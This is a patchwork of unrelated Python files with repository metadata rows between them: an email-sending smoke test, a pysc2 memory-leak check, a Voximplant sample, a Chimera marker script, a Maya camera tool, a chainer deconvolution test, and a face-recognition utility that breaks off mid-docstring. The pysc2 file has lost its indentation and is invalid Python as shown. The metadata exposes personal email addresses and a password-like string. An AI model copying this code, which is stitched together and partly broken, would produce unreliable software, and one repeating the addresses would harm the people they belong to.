    # Manual smoke test: running this module directly sends two real mails.
    sen = SendEmail()  # instantiate
    # sen.send_main([2,3,4],[5,6,7],'../report/01_report.html')
    user_list = ['xiang_kaizheng@wanweitech.com']
    emailtitle = "商户后台-登录_自动化测试报告"
    # sen.run_send(2,0,0,'1.txt',user_list,emailtitle,)
    sen.run_send(2,0,0,'1.txt',user_list,emailtitle)
    sen.run_send_with_report(2,0,0,'1.txt',user_list,emailtitle,reporturl="123")
    print("邮件已发送")
"wawj900805"
] | wawj900805 |
b7c60f81e448d17ba6e9307cc65b5f717b19cba0 | 7d1e66fec4675572d75d30c632406242973d84aa | /pysc2/bin/mem_leak_check.py | 27efe04d1d88ed96d5c2e341358cf597adea1a63 | [
"Apache-2.0"
] | permissive | monarchBacilluscoli/pysc2 | 91cdd0c85598f64f4c1c8b36126968bc04ac84a4 | e5df7d41205fdb2e205dac2777305f3f6a404e05 | refs/heads/master | 2020-03-22T17:35:57.294868 | 2018-07-09T14:18:38 | 2018-07-09T14:20:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,909 | py | #!/usr/bin/python
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for memory leaks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from absl import app
from future.builtins import range # pylint: disable=redefined-builtin
import psutil
from pysc2 import maps
from pysc2 import run_configs
from s2clientprotocol import common_pb2 as sc_common
from s2clientprotocol import sc2api_pb2 as sc_pb
def main(unused_argv):
interface = sc_pb.InterfaceOptions()
interface.raw = True
interface.score = True
interface.feature_layer.width = 24
interface.feature_layer.resolution.x = 84
interface.feature_layer.resolution.y = 84
interface.feature_layer.minimap_resolution.x = 64
interface.feature_layer.minimap_resolution.y = 64
timeline = []
start = time.time()
run_config = run_configs.get()
proc = run_config.start()
process = psutil.Process(proc.pid)
def add(s):
cpu = process.cpu_times().user
mem = process.memory_info().rss / 2 ** 20 # In Mb
timeline.append((time.time() - start, cpu, mem, s))
if mem > 2000:
raise Exception("2gb mem limit exceeded")
try:
add("Started")
controller = proc.controller
map_inst = maps.get("Simple64")
create = sc_pb.RequestCreateGame(
realtime=False, disable_fog=False,
local_map=sc_pb.LocalMap(map_path=map_inst.path,
map_data=map_inst.data(run_config)))
create.player_setup.add(type=sc_pb.Participant)
create.player_setup.add(type=sc_pb.Computer, race=sc_common.Random,
difficulty=sc_pb.CheatInsane)
join = sc_pb.RequestJoinGame(race=sc_common.Random, options=interface)
controller.create_game(create)
add("Created")
controller.join_game(join)
add("Joined")
for _ in range(30):
for i in range(2000):
controller.step(16)
obs = controller.observe()
if obs.player_result:
add("Lost")
break
if i % 100 == 0:
add(i)
controller.restart()
add("Restarted")
add("Done")
except KeyboardInterrupt:
pass
finally:
proc.close()
print("Timeline:")
for t in timeline:
print("[%7.3f] cpu: %5.1f s, mem: %4d M; %s" % t)
if __name__ == "__main__":
app.run(main)
| [
"tewalds@google.com"
] | tewalds@google.com |
05e26f13c90bcb7032e3df3e79b731b10641e170 | ee364e80138d6a2435ff069f3665b4ce36915e40 | /samples/set_pstn_black_list_item.py | 71dbaecc96a3afc048986596279305350ea06b56 | [
"MIT"
] | permissive | antoniotaranto/apiclient-python | 355b21efa7f526cc1f4edec2d45e68ec87b3e327 | 64a727ebecac27ce162f3f198edeb065ab8a6ca0 | refs/heads/master | 2022-02-18T05:14:01.075669 | 2019-09-02T09:58:57 | 2019-09-02T09:58:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | from voximplant.apiclient import VoximplantAPI, VoximplantException
if __name__ == "__main__":
voxapi = VoximplantAPI("credentials.json")
PSTN_BLACKLIST_ID = 1
PSTN_BLACKLIST_PHONE = "123456789"
try:
res = voxapi.set_pstn_black_list_item(PSTN_BLACKLIST_ID, PSTN_BLACKLIST_PHONE)
except VoximplantException as e:
print("Error: {}".format(e.message))
print(res)
| [
"andrey@voximplant.com"
] | andrey@voximplant.com |
623dda1de8d3d0b4d2a0fc34c18ffdade7630b7f | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_45120.py | 8c8adacdf9176f00eb63cc6fa601503552577bae | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,836 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets = {}
surf_sets = {}

# The optimizer output below used to be ~280 copy-pasted if-blocks, one per
# marker.  It is now a data table driven by a single loop with identical
# behaviour and ordering: each named marker set is created once (if absent)
# and receives one marker at the given position, colour and radius.
# Entry format: (marker-set name, (x, y, z), (r, g, b), radius)
_COG_MARKERS = [
    ("Cog2_GFPN", (352.476, 638.724, 582.291), (0.89, 0.1, 0.1), 18.4716),
    ("Cog2_0", (358.605, 597.696, 528.921), (0.89, 0.1, 0.1), 17.1475),
    ("Cog2_1", (360.006, 538.129, 472.639), (0.89, 0.1, 0.1), 17.1475),
    ("Cog2_GFPC", (260.763, 536.832, 570.55), (0.89, 0.1, 0.1), 18.4716),
    ("Cog2_Anch", (400.919, 419.15, 323.421), (0.89, 0.1, 0.1), 18.4716),
    ("Cog3_GFPN", (362.689, 603.98, 553.31), (1, 1, 0), 18.4716),
    ("Cog3_0", (363.104, 604.26, 554.628), (1, 1, 0.2), 17.1475),
    ("Cog3_1", (383.786, 597.414, 572.349), (1, 1, 0.2), 17.1475),
    ("Cog3_2", (401.914, 576.227, 569.112), (1, 1, 0.2), 17.1475),
    ("Cog3_3", (395.122, 554.727, 585.676), (1, 1, 0.2), 17.1475),
    ("Cog3_4", (393.041, 537.464, 607.641), (1, 1, 0.2), 17.1475),
    ("Cog3_5", (408.041, 558.029, 620.05), (1, 1, 0.2), 17.1475),
    ("Cog3_GFPC", (361.849, 632.084, 558.034), (1, 1, 0.4), 18.4716),
    ("Cog3_Anch", (460.895, 488.424, 680.522), (1, 1, 0.4), 18.4716),
    ("Cog4_GFPN", (478.101, 417.206, 492.149), (0, 0, 0.8), 18.4716),
    ("Cog4_0", (478.101, 417.206, 492.149), (0, 0, 0.8), 17.1475),
    ("Cog4_1", (462.224, 434.924, 475.577), (0, 0, 0.8), 17.1475),
    ("Cog4_2", (448.243, 458.591, 466.048), (0, 0, 0.8), 17.1475),
    ("Cog4_3", (437.243, 485.791, 466.61), (0, 0, 0.8), 17.1475),
    ("Cog4_4", (430.227, 512.278, 477.82), (0, 0, 0.8), 17.1475),
    ("Cog4_5", (422.915, 537.125, 492.732), (0, 0, 0.8), 17.1475),
    ("Cog4_6", (411.371, 558.496, 510.701), (0, 0, 0.8), 17.1475),
    ("Cog4_GFPC", (478.264, 339.255, 627.619), (0, 0, 0.8), 18.4716),
    ("Cog4_Anch", (322.506, 787.84, 421.064), (0, 0, 0.8), 18.4716),
    ("Cog5_GFPN", (401.17, 560.276, 479.165), (0.3, 0.3, 0.3), 18.4716),
    ("Cog5_0", (401.17, 560.276, 479.165), (0.3, 0.3, 0.3), 17.1475),
    ("Cog5_1", (377.925, 556.285, 495.847), (0.3, 0.3, 0.3), 17.1475),
    ("Cog5_2", (354.179, 542.323, 505.004), (0.3, 0.3, 0.3), 17.1475),
    ("Cog5_3", (330.77, 534.242, 489.633), (0.3, 0.3, 0.3), 17.1475),
    ("Cog5_GFPC", (298.217, 618.506, 574.727), (0.3, 0.3, 0.3), 18.4716),
    ("Cog5_Anch", (356.832, 450.051, 399.963), (0.3, 0.3, 0.3), 18.4716),
    ("Cog6_GFPN", (333.861, 595.647, 541.972), (0.21, 0.49, 0.72), 18.4716),
    ("Cog6_0", (333.53, 595.611, 542.117), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_1", (347.203, 573.288, 551.924), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_2", (373.003, 563.148, 546.579), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_3", (396.472, 548.671, 539.74), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_4", (418.065, 547.744, 558.428), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_5", (430.679, 559.732, 581.076), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_6", (430.672, 576.388, 604.19), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_GFPC", (431.783, 615.262, 527.931), (0.21, 0.49, 0.72), 18.4716),
    ("Cog6_Anch", (425.852, 536.885, 682.177), (0.21, 0.49, 0.72), 18.4716),
    ("Cog7_GFPN", (402.265, 622.66, 493.199), (0.7, 0.7, 0.7), 18.4716),
    ("Cog7_0", (381.581, 606.601, 494.963), (0.7, 0.7, 0.7), 17.1475),
    ("Cog7_1", (336.68, 571.248, 501.323), (0.7, 0.7, 0.7), 17.1475),
    ("Cog7_2", (292.39, 534.995, 507.699), (0.7, 0.7, 0.7), 17.1475),
    ("Cog7_GFPC", (253.962, 602.149, 531.025), (0.7, 0.7, 0.7), 18.4716),
    ("Cog7_Anch", (261.609, 435.337, 499.567), (0.7, 0.7, 0.7), 18.4716),
    ("Cog8_0", (414.473, 508.881, 510.245), (1, 0.5, 0), 17.1475),
    ("Cog8_1", (394.44, 529.132, 510.565), (1, 0.5, 0), 17.1475),
    ("Cog8_2", (391.599, 527.856, 482.275), (1, 0.5, 0), 17.1475),
    ("Cog8_3", (388.902, 537.14, 455.443), (1, 0.5, 0), 17.1475),
    ("Cog8_4", (368.05, 550.755, 441.85), (1, 0.5, 0), 17.1475),
    ("Cog8_5", (343.154, 562.174, 434.26), (1, 0.5, 0), 17.1475),
    ("Cog8_GFPC", (356.516, 603.72, 502.695), (1, 0.6, 0.1), 18.4716),
    ("Cog8_Anch", (325.684, 522.843, 364.971), (1, 0.6, 0.1), 18.4716),
]

for _name, _pos, _color, _radius in _COG_MARKERS:
    if _name not in marker_sets:
        marker_sets[_name] = new_marker_set(_name)
    s = marker_sets[_name]
    mark = s.place_marker(_pos, _color, _radius)
# Register every accumulated surface model with Chimera's open-model list.
for surf_model in surf_sets.values():
    chimera.openModels.add([surf_model])
| [
"batxes@gmail.com"
] | batxes@gmail.com |
b70144b62bd5c217a8e2b1f03e36a1c6efffae61 | a1b21aa9b4c3b99b9b16fd47686bcc76e6fafd18 | /file_and_exceptions/json_practice/favorite_number/favorite_number_writer.py | 3fc63f2e0de4fe8ce4be781f231ee1e33662a89b | [] | no_license | irfan87/python_tutorial | 986c5dae98a5ad928c3820bf0355f544c091caf0 | 71bbf8b8aba2d5a1fafc56b8cb15d471c428a0cf | refs/heads/master | 2020-06-05T00:52:07.619489 | 2019-08-19T02:56:41 | 2019-08-19T02:56:41 | 192,257,432 | 0 | 0 | null | 2019-08-19T02:56:42 | 2019-06-17T01:53:46 | Python | UTF-8 | Python | false | false | 562 | py | import os
import json
# Path of the JSON file that persists the user's favorite number.
file_name = os.path.abspath('file_and_exceptions/json_practice/favorite_number/fav_number.json')

try:
    # load the json file
    with open(file_name) as json_file:
        json_content = json.load(json_file)
except FileNotFoundError:
    # First run: no stored number yet -- prompt the user and persist the answer.
    user_prompt = input("Please enter your favorite number: ")
    # write the file
    with open(file_name, 'w') as json_file:
        json.dump(user_prompt, json_file)
    print("To view the your favorite number, please run this app again.")
else:
    # The file existed and parsed cleanly: show the stored value.
    print("Your favorite number is:", json_content)
"nerve2009@yahoo.com"
] | nerve2009@yahoo.com |
1118c8d3e5916329ace94860afc9e49ca5ba44b5 | b521802cca8e4ee4ff5a5ffe59175a34f2f6d763 | /maya/maya-utils/Scripts/Animation/2019-2-15 Tim Cam_Route_Manager/.history/Cam_Main/Cam_Main/Cam_Main_20190119164337.py | b7c7b6c65137050e80d0869f13162fb06f8dbb2a | [] | no_license | all-in-one-of/I-Do-library | 2edf68b29558728ce53fe17168694ad0353a076e | 8972ebdcf1430ccc207028d8482210092acf02ce | refs/heads/master | 2021-01-04T06:58:57.871216 | 2019-12-16T04:52:20 | 2019-12-16T04:52:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,519 | py | # -*- coding:utf-8 -*-
# Require Header
import os
import json
from functools import partial
# Sys Header
import sys
import traceback
import subprocess
# Maya Header
import maya.cmds as cmds
import maya.mel as mel
import maya.OpenMayaUI as omui
import plugin.Qt as Qt
from Qt.QtCore import *
from Qt.QtGui import *
from Qt.QtWidgets import *
def loadUiType(uiFile):
    """Load a Qt Designer .ui file and return ``(form_class, base_class)``.

    Mirrors PyQt's ``uic.loadUiType`` across bindings: PyQt delegates to the
    bundled uic; PySide/PySide2 compile the .ui XML to Python source in
    memory and exec it to recover the generated form class.
    """
    import plugin.Qt as Qt
    if Qt.__binding__.startswith('PyQt'):
        from Qt import _uic as uic
        return uic.loadUiType(uiFile)
    elif Qt.__binding__ == 'PySide':
        import pysideuic as uic
    else:
        import pyside2uic as uic
    import xml.etree.ElementTree as xml
    from cStringIO import StringIO
    # Read the top-level widget class (e.g. QMainWindow) and the form class
    # name straight from the Designer XML.
    parsed = xml.parse(uiFile)
    widget_class = parsed.find('widget').get('class')
    form_class = parsed.find('class').text
    with open(uiFile, 'r') as f:
        o = StringIO()
        frame = {}
        # Compile the .ui into Python source, then execute it in `frame`
        # so the generated Ui_* class can be pulled out below.
        uic.compileUi(f, o, indent=0)
        pyc = compile(o.getvalue(), '<string>', 'exec')
        exec pyc in frame
        # Fetch the base_class and form class based on their type
        # in the xml from designer
        form_class = frame['Ui_%s'%form_class]
        base_class = eval('%s'%widget_class)
    return form_class, base_class
from Qt.QtCompat import wrapInstance
DIR = os.path.dirname(__file__)
UI_PATH = os.path.join(DIR,"ui","Cam_Main.ui")
GUI_STATE_PATH = os.path.join(DIR, "json" ,'GUI_STATE.json')
form_class , base_class = loadUiType(UI_PATH)
import Cam_Item_Layout
import Cam_Attribute_Panel
reload(Cam_Item_Layout)
reload(Cam_Attribute_Panel)
from Cam_Item_Layout import Cam_Item_Layout
from Cam_Attribute_Panel import Cam_Attribute_Panel
class Cam_Main(form_class,base_class):
    """Main window of the camera-route manager.

    Hosts a splitter with the camera item list (left, ``Cam_Item_Layout``)
    and the attribute panel (right, ``Cam_Attribute_Panel``), and persists
    GUI state to ``GUI_STATE.json``.
    """
    def __init__(self):
        super(Cam_Main,self).__init__()
        self.setupUi(self)
        self.Cam_Item_Widget = Cam_Item_Layout(self)
        self.Cam_Attribute_Widget = Cam_Attribute_Panel(self)
        splitter = QSplitter()
        splitter.setHandleWidth(5)
        splitter.addWidget(self.Cam_Item_Widget)
        splitter.addWidget(self.Cam_Attribute_Widget)
        self.Main_Layout.layout().addWidget(splitter)
        # Route clicks on the item list through this window's handler.
        self.Cam_Item_Widget.mousePressEvent = self.Cam_Item_Pressing_Event
        self.Default_Attr_Setting()

    def Default_Attr_Setting(self):
        """Reset the attribute panel to its 'no camera selected' state."""
        self.Cam_Attribute_Widget.Cam_Name_Label.setText(u"<center> - 请选择镜头 - </center>")
        self.Cam_Attribute_Widget.Cam_Input_Toggle.setVisible(False)
        self.Cam_Attribute_Widget.Cam_Input_Layout.setVisible(False)
        self.Cam_Attribute_Widget.Cam_Output_Toggle.setVisible(False)
        self.Cam_Attribute_Widget.Cam_Output_Layout.setVisible(False)

    def Cam_Item_Pressing_Event(self,e):
        """
        mousePressEvent
        # Note: fired when the camera item list is clicked.
        """
        ## Note: clear every selection outline first.
        for i,child in enumerate(self.Cam_Item_Widget.Item_Layout.children()):
            if i != 0:
                if child.Cam_Item.styleSheet() != "":
                    child.Cam_Item.setStyleSheet("")
        self.Cam_Item_Widget.setStyleSheet("")
        ## Note: vertical offset between click and item coordinates.
        offset = 90-self.Cam_Item_Widget.Scroll_Offset
        for i,child in enumerate(self.Cam_Item_Widget.Item_Layout.children()):
            if i != 0:
                ## Note: if the click lands on this item, load its data.
                if child.geometry().contains(e.pos().x(),e.pos().y()-offset):
                    child.Cam_Item.setStyleSheet("#Cam_Item{border:3px solid red}" )
                    CamName = child.Cam_LE.text()
                    self.Cam_Attribute_Widget.Cam_Input_Toggle.setVisible(True)
                    self.Cam_Attribute_Widget.Cam_Input_Layout.setVisible(True)
                    self.Cam_Attribute_Widget.Cam_Output_Toggle.setVisible(True)
                    self.Cam_Attribute_Widget.Cam_Output_Layout.setVisible(True)
                    self.Cam_Attribute_Widget.Add_CamGrp_Layout.setVisible(True)
                    self.Cam_Attribute_Widget.Strat_Time_Layout.setVisible(True)
                    self.Cam_Attribute_Widget.End_Time_Layout.setVisible(True)
                    self.Cam_Attribute_Widget.Auto_Catch_Label.setVisible(True)
                    self.Cam_Attribute_Widget.Add_Loc_Layout.setVisible(True)
                    self.Cam_Attribute_Widget.Current_Item = child
                    if os.path.exists(GUI_STATE_PATH):
                        GUI_STATE = {}
                        with open(GUI_STATE_PATH,'r') as f:
                            GUI_STATE = json.load(f)
                        Attr = GUI_STATE['Cam_Item'][CamName]["Attr"]
                        # Note: validate the scene selection before loading.
                        if self.Cam_Attribute_Widget.Check_Selection() and Attr["Add_CamGrp_LE"] != "":
                            self.Cam_Attribute_Widget.Cam_Name_Label.setText(u"<center> - %s - </center>" % CamName)
                            self.Cam_Attribute_Widget.Strat_Time_SB.setValue(int(Attr["Strat_Time_SB"]))
                            self.Cam_Attribute_Widget.End_Time_SB.setValue(int(Attr["End_Time_SB"]))
                            # Preserve the user's Maya selection around the pick.
                            currentSelect = cmds.ls(sl=1)
                            cmds.select(Attr["Add_CamGrp_LE"])
                            self.Cam_Attribute_Widget.Add_CamGrp_Pick_Fun()
                            cmds.select(currentSelect)
                        else:
                            self.Cam_Attribute_Widget.Strat_Time_SB.setValue(0)
                            self.Cam_Attribute_Widget.End_Time_SB.setValue(0)
                            self.Cam_Attribute_Widget.Add_CamGrp_Pick_Fun()
                            self.Cam_Attribute_Widget.Add_Motion_Path_Pick_Fun()
                            self.Cam_Attribute_Widget.Add_Crv_Pick_Fun()
                            # self.Cam_Attribute_Widget.Add_CamGrp_LE.setText("")
                            # self.Cam_Attribute_Widget.Add_Loc_LE.setText("")
                            # self.Cam_Attribute_Widget.Add_Crv_LE.setText("")
                            # self.Cam_Attribute_Widget.Add_Motion_Path_LE.setText("")
                        self.Save_Json_Fun()
                    else:
                        QMessageBox.warning(self, u"Warning", u"加载参数失败")
                    break
        else:
            ## Note: the whole list was traversed with no hit -- check the
            ## base camera row, otherwise fall back to the default panel.
            if self.Cam_Item_Widget.Cam_Base_Label.geometry().contains(e.pos().x(),e.pos().y()-40):
                self.Cam_Item_Widget.setStyleSheet("#Cam_Base_Layout{border:3px solid red}" )
                self.Cam_Attribute_Widget.Current_Item = self.Cam_Item_Widget
                self.Cam_Attribute_Widget.Cam_Input_Toggle.setVisible(True)
                self.Cam_Attribute_Widget.Cam_Input_Layout.setVisible(True)
                self.Cam_Attribute_Widget.Cam_Output_Toggle.setVisible(False)
                self.Cam_Attribute_Widget.Cam_Output_Layout.setVisible(False)
                self.Cam_Attribute_Widget.Add_CamGrp_Layout.setVisible(False)
                self.Cam_Attribute_Widget.Strat_Time_Layout.setVisible(False)
                self.Cam_Attribute_Widget.End_Time_Layout.setVisible(False)
                self.Cam_Attribute_Widget.Auto_Catch_Label.setVisible(False)
                self.Cam_Attribute_Widget.Add_Loc_Layout.setVisible(False)
                Cam_Base_Name = self.Cam_Item_Widget.Cam_Base_LE.text()
                Attr = self.Cam_Item_Widget.Attr
                # Note: validate the scene selection before loading.
                if self.Cam_Attribute_Widget.Check_Selection():
                    self.Cam_Attribute_Widget.Cam_Name_Label.setText(u"<center> - %s - </center>" % Cam_Base_Name)
                    currentSelect = cmds.ls(sl=1)
                    cmds.select(Attr["Add_Crv_LE"])
                    self.Cam_Attribute_Widget.Add_Crv_Pick_Fun()
                    cmds.select(currentSelect)
                else:
                    self.Cam_Attribute_Widget.Add_Crv_LE.setText("")
                    self.Cam_Attribute_Widget.Add_Motion_Path_LE.setText("")
                self.Save_Json_Fun()
            else:
                self.Default_Attr_Setting()

    def Save_Json_Fun(self,path=GUI_STATE_PATH):
        """Serialize every camera item plus the base camera to ``path``."""
        GUI_STATE = {}
        # NOTE(review): self.DOCK is never assigned in __init__ here --
        # presumably set by the dock-launch code elsewhere; confirm.
        GUI_STATE['DOCK'] = self.DOCK
        GUI_STATE['Cam_Item'] = {}
        GUI_STATE['Cam_Base'] = {}
        for i,child in enumerate(self.Cam_Item_Widget.Item_Layout.children()):
            if i != 0:
                CamName = child.Cam_LE.text()
                GUI_STATE['Cam_Item'][CamName] = {}
                GUI_STATE['Cam_Item'][CamName]["Num"] = child.Num
                GUI_STATE['Cam_Item'][CamName]["Cam"] = child.Cam_LE.text()
                GUI_STATE['Cam_Item'][CamName]["Attr"] = {}
                GUI_STATE['Cam_Item'][CamName]["Attr"]["Add_Loc_LE"] = child.Attr["Add_Loc_LE"]
                GUI_STATE['Cam_Item'][CamName]["Attr"]["Add_Crv_LE"] = child.Attr["Add_Crv_LE"]
                GUI_STATE['Cam_Item'][CamName]["Attr"]["Add_Motion_Path_LE"] = child.Attr["Add_Motion_Path_LE"]
                GUI_STATE['Cam_Item'][CamName]["Attr"]["Add_CamGrp_LE"] = child.Attr["Add_CamGrp_LE"]
                GUI_STATE['Cam_Item'][CamName]["Attr"]["Strat_Time_SB"] = child.Attr["Strat_Time_SB"]
                GUI_STATE['Cam_Item'][CamName]["Attr"]["End_Time_SB"] = child.Attr["End_Time_SB"]
        GUI_STATE['Cam_Base']["Attr"] = {}
        GUI_STATE['Cam_Base']["Attr"]["Add_Crv_LE"] = self.Cam_Item_Widget.Attr["Add_Crv_LE"]
        GUI_STATE['Cam_Base']["Attr"]["Add_Motion_Path_LE"] = self.Cam_Item_Widget.Attr["Add_Motion_Path_LE"]
        GUI_STATE['Cam_Base']["Attr"]["Name"] = self.Cam_Item_Widget.Cam_Base_LE.text()
        try:
            with open(path,'w') as f:
                json.dump(GUI_STATE,f,indent=4)
        except:
            if path != "":
                QMessageBox.warning(self, u"Warning", u"保存失败")

    def Load_Json_Fun(self,path=GUI_STATE_PATH,load=False):
        """Rebuild the GUI from ``path``; return True on success.

        When ``load`` is True a warning dialog is shown if the file is
        missing (explicit user-triggered load); silent otherwise.
        """
        if os.path.exists(path):
            GUI_STATE = {}
            with open(path,'r') as f:
                GUI_STATE = json.load(f)
            for CamName in GUI_STATE['Cam_Item']:
                # Create a fresh item row and restore its attributes.
                Cam = self.Cam_Item_Widget.Item_Add_Fn()
                CamAttr = GUI_STATE['Cam_Item'][CamName]["Attr"]
                Cam.Num = GUI_STATE['Cam_Item'][CamName]["Num"]
                Cam.Attr["Add_Loc_LE"] = CamAttr["Add_Loc_LE"]
                Cam.Attr["Add_Crv_LE"] = CamAttr["Add_Crv_LE"]
                Cam.Attr["Add_Motion_Path_LE"] = CamAttr["Add_Motion_Path_LE"]
                Cam.Attr["Add_CamGrp_LE"] = CamAttr["Add_CamGrp_LE"]
                Cam.Attr["Strat_Time_SB"] = CamAttr["Strat_Time_SB"]
                Cam.Attr["End_Time_SB"] = CamAttr["End_Time_SB"]
                Cam.Cam_LE.setText(GUI_STATE['Cam_Item'][CamName]["Cam"])
            self.Cam_Item_Widget.Attr["Add_Crv_LE"] = GUI_STATE['Cam_Base']["Attr"]["Add_Crv_LE"]
            self.Cam_Item_Widget.Attr["Add_Motion_Path_LE"] = GUI_STATE['Cam_Base']["Attr"]["Add_Motion_Path_LE"]
            self.Cam_Item_Widget.Cam_Base_LE.setText(GUI_STATE['Cam_Base']["Attr"]["Name"])
            return True
        else:
            if load==True:
                QMessageBox.warning(self, u"Warning", u"加载失败\n检查路径是否正确")
            return False
| [
"2595715768@qq.com"
] | 2595715768@qq.com |
03f52294b6ae8c54a9f097c5e9a3df1f9bdb0115 | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/pfnet_chainer/chainer-master/tests/chainer_tests/links_tests/connection_tests/test_deconvolution_nd.py | 5ba25749e626b7c36370304d1ad40afe3db55bb1 | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 4,199 | py | import unittest
import numpy
import chainer
from chainer import cuda
from chainer import gradient_check
from chainer import initializers
from chainer.links import deconvolution_nd
from chainer import testing
from chainer.testing import attr
from chainer.testing import condition
from chainer.testing import parameterize
from chainer.utils import conv
# Cross-product of shapes/bias/cudnn/outsize cases, plus a dtype sweep for
# the single 3-D shape with bias and cudnn enabled.
@parameterize(*testing.product({
    'dims': [(5, 4, 3), (4, 3), (3,)],
    'nobias': [True, False],
    'dtype': [numpy.float32],
    'use_cudnn': [True, False],
    'used_outsize': ['case1', 'case2', 'None'],
}) + testing.product({
    'dims': [(5, 4, 3)],
    'nobias': [False],
    'dtype': [numpy.float16, numpy.float32, numpy.float64],
    'use_cudnn': [True],
    'used_outsize': ['None'],
}))
class TestDeconvolutionND(unittest.TestCase):
    """CPU/GPU forward-consistency and gradient tests for DeconvolutionND."""

    def setUp(self):
        N = 2
        in_channels = 3
        out_channels = 2
        ndim = len(self.dims)
        ksize = (3,) * ndim
        stride = (2,) * ndim
        pad = (1,) * ndim
        if self.used_outsize == 'case1' or self.used_outsize == 'None':
            # Use output size determined with get_deconv_outsize.
            outs = tuple(
                conv.get_deconv_outsize(d, k, s, p)
                for (d, k, s, p) in zip(self.dims, ksize, stride, pad))
        elif self.used_outsize == 'case2':
            # Use possible output size other than the one determined with
            # get_deconv_outsize.
            outs = tuple(
                conv.get_deconv_outsize(d, k, s, p) + 1
                for (d, k, s, p) in zip(self.dims, ksize, stride, pad))
        if self.used_outsize != 'None':
            outsize = outs
        else:
            outsize = None

        if not self.nobias:
            initial_bias = initializers.Uniform(scale=1, dtype=self.dtype)
        else:
            initial_bias = None

        self.link = deconvolution_nd.DeconvolutionND(
            ndim, in_channels, out_channels, ksize, stride=stride, pad=pad,
            outsize=outsize, initial_bias=initial_bias)
        self.link.cleargrads()

        # Random input and upstream gradient matching the link's geometry.
        x_shape = (N, in_channels) + self.dims
        self.x = numpy.random.uniform(-1, 1, x_shape).astype(self.dtype)
        gy_shape = (N, out_channels) + outs
        self.gy = numpy.random.uniform(-1, 1, gy_shape).astype(self.dtype)

        # float16 needs much looser numeric tolerances.
        self.check_forward_options = {}
        self.check_backward_options = {
            'eps': 1e-2, 'atol': 1e-4, 'rtol': 1e-3}
        if self.dtype == numpy.float16:
            self.check_forward_options = {'atol': 5e-3, 'rtol': 5e-2}
            self.check_backward_options = {
                'eps': 2 ** -3, 'atol': 1e-2, 'rtol': 1e-1}

    def check_forward_consistency(self, link, x_data):
        """Assert CPU and GPU forward passes agree within tolerance."""
        x_cpu = chainer.Variable(x_data)
        y_cpu = link(x_cpu)
        self.assertEqual(y_cpu.data.dtype, x_data.dtype)

        link.to_gpu()
        x_gpu = chainer.Variable(cuda.to_gpu(x_data))
        y_gpu = link(x_gpu)
        self.assertEqual(y_gpu.data.dtype, x_data.dtype)

        testing.assert_allclose(
            y_cpu.data, y_gpu.data, **self.check_forward_options)

    @attr.gpu
    @condition.retry(3)
    def test_forward_consistency(self):
        self.link.use_cudnn = self.use_cudnn
        self.check_forward_consistency(self.link, self.x)

    def check_backward(self, link, x_data, y_grad):
        """Numerically verify gradients w.r.t. W (and b when present)."""
        params = [link.W]
        if not self.nobias:
            params.append(link.b)

        gradient_check.check_backward(
            link, x_data, y_grad, params, **self.check_backward_options)

    @condition.retry(3)
    def test_backward_cpu(self):
        self.check_backward(self.link, self.x, self.gy)

    @attr.gpu
    @condition.retry(3)
    def test_backward_gpu(self):
        self.link.use_cudnn = self.use_cudnn
        self.link.to_gpu()
        self.check_backward(
            self.link, cuda.to_gpu(self.x), cuda.to_gpu(self.gy))
class TestDeconvolutionNDNoInitialBias(unittest.TestCase):
    """Passing initial_bias=None must leave the link's bias parameter unset."""

    def test_no_initial_bias(self):
        # 3-D deconvolution: 3 input channels, 2 output channels, ksize 3.
        link = deconvolution_nd.DeconvolutionND(3, 3, 2, 3, initial_bias=None)
        self.assertIsNone(link.b)
testing.run_module(__name__, __file__)
| [
"659338505@qq.com"
] | 659338505@qq.com |
f4b7c388edf75b83c3b1a73d48fcbd7b0f0cb3be | e25c3d29713a508ba2f4b76f6416b8f260429723 | /utils.py | 8c8e245b8f132c77a6e6ff940c97de33870d6e4e | [] | no_license | EaseCloud/face-api | 7c22219a8cdf65b408a369cfba6ac2930462889b | 0fff8ab7d74f1b0c669ca1bac8efbc01f13867be | refs/heads/master | 2020-03-10T10:13:46.774712 | 2018-04-17T03:29:25 | 2018-04-17T03:29:25 | 129,328,632 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,756 | py | import json
import os
import pickle
import sys
import face_recognition
from bottle import Response
import config
def read_data(group_id):
    """Read the face encodings of a specific group from the repository.

    Creates an empty repository file for the group on first access.

